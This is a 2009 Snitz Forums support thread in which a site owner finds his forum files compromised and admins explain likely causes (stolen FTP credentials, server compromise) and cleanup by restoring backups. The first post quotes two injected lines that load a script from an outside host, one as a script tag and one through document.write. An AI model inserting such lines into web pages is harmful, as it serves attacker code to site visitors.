| Author |
 Topic  |
|
|
balexandre
Junior Member
Denmark
418 Posts |
 Posted - 10 December 2009 : 19:26:25
|
Guys,
I just found out that in all my forum files I have at the end of the each file:
<script src=http://dowcipy.waa.pl/3f4d8c9d92c3b6757b06a65a85b4f82f/conn_mysql.php ></script>
and
document.write('<script src=http://dowcipy.waa.pl/3f4d8c9d92c3b6757b06a65a85b4f82f/conn_mysql.php ><\/script>');
in javascript files
like the config.asp file
Can I suggest Huw, Rui & Co to provide the Snitz Forum in a SVN so we can generate Diff files easily in order to "update" our old versions?
I'm running v3.4.06 patched with latest securities 
even though this got it here some how
P.S. I'm not blaming Snitz as this can be something else, but just to provide information regarding this domain and ask the SVN part 
|
Bruno Alexandre
(Strøby, DANMARK)
"a Portuguese in Danmark"
|
Edited by - balexandre on 10 December 2009 19:37:04 |
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
Posted - 10 December 2009 : 19:44:25
|
Bruno,
That type of hack means they had access to your server. They didn't change your database, they just changed your forum files. It's a common issue and usually means your FTP data was compromised, usually by a trojan or some other form of malware in a computer from where you normally ftp to your server. Another chance, though less likely, is that the server was compromised in some way, so you should talk to your host about it. Finally, if you have some sort of upload mod, that could also be a way to a script to have reached your site and then executed to change your files.
The fix for that is also simple: if you have a good copy of the files (which you should), just upload it to the server. If you don't, download all the files and search for <script src=htt...> and remove the line from each file.
I think one of these is your best option to fix it, since you will have a customized version of the forum code. |
Snitz 3.4 Readme | Like the support? Support Snitz too |
 |
|
|
balexandre
Junior Member
Denmark
418 Posts |
Posted - 10 December 2009 : 19:49:59
|
thank you for the insight...
and regarding the SVN idea? |
Bruno Alexandre
(Strøby, DANMARK)
"a Portuguese in Danmark"
|
Edited by - balexandre on 10 December 2009 19:50:14 |
|
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
Posted - 10 December 2009 : 20:08:49
|
| Sorry, we don't use SVN. I think 3.4.06 is likely available from SourceFourge, but I don't really see the need for you to use a clean 3.4.06, since these hacks are relatively easy to clean... |
Snitz 3.4 Readme | Like the support? Support Snitz too |
|
|
|
Davio
Development Team Member
Jamaica
12217 Posts |
|
|
Panhandler
Average Member
USA
783 Posts |
Posted - 11 December 2009 : 09:19:04
|
You can remove instances of the unwanted code with BK ReplacEM
It worked for me although the app wasn't intuitive and required a little study and experimentation on my part.
|
|
|
|
RichardKinser
Snitz Forums Admin
USA
16655 Posts |
|
|
Davio
Development Team Member
Jamaica
12217 Posts |
Posted - 11 December 2009 : 18:08:10
|
| That's 3.4.06 Rich. You have a SVN for all the version we have on sourceforge? |
Support Snitz Forums
|
|
|
|
Panhandler
Average Member
USA
783 Posts |
Posted - 12 December 2009 : 10:22:28
|
quote:
Originally posted by Davio
That's 3.4.06 Rich. You have a SVN for all the version we have on sourceforge?
No.
He has to clean up all the files and upload them again.
BK ReplaceEm is available from several sources.
http://www.softpedia.com/get/System/File-Management/BK-ReplaceEm.shtml
"At its core, ReplaceEm is essentially a text search-and-replace program. However, unlike the search-replace functionality of a standard text editor, ReplaceEm is designed to operate on multiple files at once." |
|
|
|
Davio
Development Team Member
Jamaica
12217 Posts |
Posted - 12 December 2009 : 11:35:57
|
quote:
Originally posted by Panhandler
No.
He has to clean up all the files and upload them again.
BK ReplaceEm is available from several sources.
http://www.softpedia.com/get/System/File-Management/BK-ReplaceEm.shtml
"At its core, ReplaceEm is essentially a text search-and-replace program. However, unlike the search-replace functionality of a standard text editor, ReplaceEm is designed to operate on multiple files at once."
lol ok. But why you quoting me, when you not answering me?  |
Support Snitz Forums
|
|
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
|
|
Davio
Development Team Member
Jamaica
12217 Posts |
Posted - 12 December 2009 : 18:49:21
|
quote:
Originally posted by ruirib
Maybe because his real name is Rich  .
DWL!!! That could explain it!  |
Support Snitz Forums
|
|
|
|
MaD2ko0l
Senior Member
United Kingdom
1053 Posts |
Posted - 14 December 2009 : 12:57:12
|
| or, if u have backup copies (like you should) then u can just re upload these files instead of faffing about tryign to find all instances of it. |
© 1999-2010 MaD2ko0l |
|
|
|
Panhandler
Average Member
USA
783 Posts |
Posted - 16 December 2009 : 10:12:58
|
quote:
Originally posted by MaD2ko0l
or, if u have backup copies (like you should) then u can just re upload these files instead of faffing about tryign to find all instances of it.
Bingo!
|
|
|
| |
Topic |
|
Topic Locked
